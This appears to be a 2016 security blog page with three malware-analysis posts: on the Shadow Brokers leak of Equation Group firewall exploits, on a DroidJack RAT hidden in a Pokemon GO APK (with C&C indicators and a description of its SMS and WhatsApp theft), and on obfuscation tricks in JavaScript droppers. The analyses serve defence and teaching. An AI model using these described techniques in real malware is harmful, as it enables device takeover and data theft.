Monday, 22 August 2016

, , , , , ,

Hackers Vs Hackers - Equation Group's Cyber Weapon Leaked




One week ago in Pastebin website, a new paste was posted, its title is "Equation Group - Cyber Weapons Auction".


This paste seems to be published by a group of hackers called Shadow Brokers. The group
claims to have attack tools and exploits which is probably attributable to hacker group known like "Equation Group", likely linked NSA.
Data, including exploits and hacking tools, were published on their Github and Tumblr, but the accounts were promptly suspended.  Data links to two distinct PGP-encrypted archives.

According to the information published by Edward Snowden, USA have the responsibility for these attacks.


In the leak, we found some link with some of the hacking tools names used in the documents leaked by Edward Snowden, like "BANANAGLEE" and "EPICBANANA".

Since 2001, the Equation Group has thousands infected victims in over 30 countries worldwide from every sectors, like: government and diplomatic institutions, telecommunications, aerospace, energy, nuclear research, oil and gas industry, military, etc.

The Intercept, on last Friday, published a new set of documents from the Edward Snowden archive. These documents confirms that the files leaked by the Shadow Brokers contain authentic NSA software and hacking tools used to secretly infect computers worldwide.

Archive Analysis

The archive has two files:
  • eqgrp-free-file.xz.gpg, Shadow Brokers group released the password for free to give evidence about the leak.
  • eqgrp-auction-file.xz.gpg, Shadow Brokers group auction off the password for this archive (they are asking for 1 Million Bitcoins in an auction to release the cyber weapons and more files belonging to the arsenal of the Equation Group).

Extracting free archive in my windows lab, immediately my AV triggered three warnings about three trojan horse.
  • egregiousblunder_3.0.0.1
  • workit.py
  • ELBA (it is a compiled version of ELBA.sh)
To avoid to have my lab compromised, I decided to switch to my linux lab and extract the archive there.

Freely distributed archive contains a small amount of information that does not directly indicate the data belonging to the Equation Group.

The exploits appear to be targeting firewalls, particularly Cisco PIX/ASA, Juniper Netscreen, Fortigate, and more.

Checking the files, is possible to identify a "extrabacon_1.1.0.1", python file, where is present a piece of code that contains if-else cascading to check Cisco appliance version.

The image below report the shellcode files for each Cisco ASA version.

ExtraBacon Exploit contains a zero-day vulnerability (CVE-2016-6366) that affect the source code of Cisco ASA software that manage Simple Network Management Protocol (SNMP).
This vulnerabilty could allow an unauthenticated remote attacker to cause a reboot the of the system (Quote:. Cisco advisory).

American Security Firm, like Cisco, Fortinet, Juniper and also an Cina Firm, like TopSec, have released patchs to fix these vulnerability.


If everything is true, we are officially in a cyber warfare!!

Thursday, 21 July 2016

Monday, 18 July 2016

, , , , ,

Pokemon GO evolves in Malware GO - Part 1






















As reported from different fonts, Pokemon Go is a virtual reality game and it is also the first game developed by Nintendo for smartphone Android and iOS.

Researchers discovered an infected Android version of the mobile game Pokemon GO. The installation file (APK) was modified to include a malicious remote access tool (RAT) called DroidJack, which would give an attacker full control over a victim’s phone.The game was first released in Australia and New Zealand on July 4th and on July 6th in the US. 

The game had not been officially released globally at the same time, many gamers wishing to access the game before it was released in their country, attempted to download a copy of the game outside of legitimate channels.


PART 1 - STATIC ANALYSIS


In the first part of this article I want to do a deep dive analysis of the evil APK and compare the differences between the real and the infected App.

Who created the evil App retrieved a game's copy, inserted inside a RAT tool and spread the APK in different third part market. The attacker took advantages of frenzy of the rest of the world to play the game before to be official released in the countries.


HERE WE GOOOOOOO!!!!


First of all I think it is important to analyze the differences between PERMISSIONs included within the Manifest file.

























In the red square is highlighted a part of permissions added into the evil APK.

The user, accepting these permissions give to the attacker the full access of his SMS, contacts list, camera, microphone, Internal and external (SD card) memory, etc.

Another evidence is reported in the image below. In the green square is present the safe part of the APK, in the red square is reported the padding code, where different droidjack server services are invoked to be enabled.
In the same part is possible to read the declaration of two activities, CamSnapDJ and VideoSnapDJ
Two receivers are also declared:
  • Connector to run on boot completed
  • CallListener to read phone state
























Inspecting content of both APK files, stand out that three different packages were added by the attacker. 


Droidjack is also known as SandroRat, below is reported the evidence:


The attacker used Java Crypto library to encrypt communications with AES (Advanced Encryption Standard) algorithm.

Source: https://docs.oracle.com/javase/7/docs/api/javax/crypto/Cipher.html

I was able to decode the Key from the byte array


Below is reported the URL contacted and the port used to communicate with the C&Cs.



This malware identifies the device and creates a Database to store these information. Then everything is sent to the website http://droidjack(dot)net/storeReport(dot)php.
































In the class bs the attacker verifies if the device is rooted by checking into the fonder /system/app/ the existence of the APK file Superuser.apk.

If the smartphone is rooted, this malware will have device full control.



The image below reports how this malware monitors and stores information about SMS incoming, outgoing, and in drafted.



In the last picture I reported how the Whatsapp database is read and stolen.




Finally, this report evidences how third part market that give you the opportunity to download APK for free, could spread malicious App. To protect yourself from possible infections, download apps from official app store and not from third-party site.


There's no such thing as a free lunch!!


IOC:

SHA256: 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4
MD5: d350cc8222792097317608ea95b283a8
Domain: 
  • http://pokemon.no-ip.org (IP address: 88.223.178.130)
  • http://droidjack.net/storeReport.php (IP: 162.251.80.24)


Dynamic analysis is coming soon...


Thursday, 7 July 2016

, , , ,

JS Dropper Galaxy

The wonderful ways to obfuscate JavaScript Dropper




Malware Analysis and Code Reverse Engineering is one of my passion in security field.

Today I'd like to show two wonderful ways to offuscate a JavaScript file in order to get complicated code analysis.

I analyzed the same phishing campaign (based on e-mail's Object) that spreads two different JavaScript dropper. 

As usual the author try to lure the user using double file extensions. 


The first is the following:

This file is well obfuscated and only a dynamic analysis help you to understand which actions it will perform during its execution.

The second is the following:

JavaScript Obfuscated Code - Part  1
JavaScript Obfuscated Code - Part 2
This JavaScript give me the evidence that who create it is not a very expert in code development and obfuscating field.

The trick used to obfuscate this file is to create a lot of functions that have an array filled with random number and only one position with text or one char, the function will return when invoked a specific position that is the only char present into the array. (Look Part 1)

The second part shows as who created this file, invoked more than one function within specified array position in order to rebuild URL and other objects ("Scripting.FileSystemObject", "ADODB.Stream", "MSXML2.XMLHTTP") used for evil purpose.

Below I am reporting two images that show the JavaScript code de-obfuscated. Reading it you can see which Objects will invoked in your OS when the JS file will be executed, which URL will be contacted and in which folder the evil files will be stored in your computer. 

No dynamic analysis is necessary to understand which actions this JavaScript will be performed and which URL will be requested.

JavaScript De-obfuscated Code - Part 1
JavaScript De-obfuscated Code - Part 2

 The same Campaign, two different file...?!?!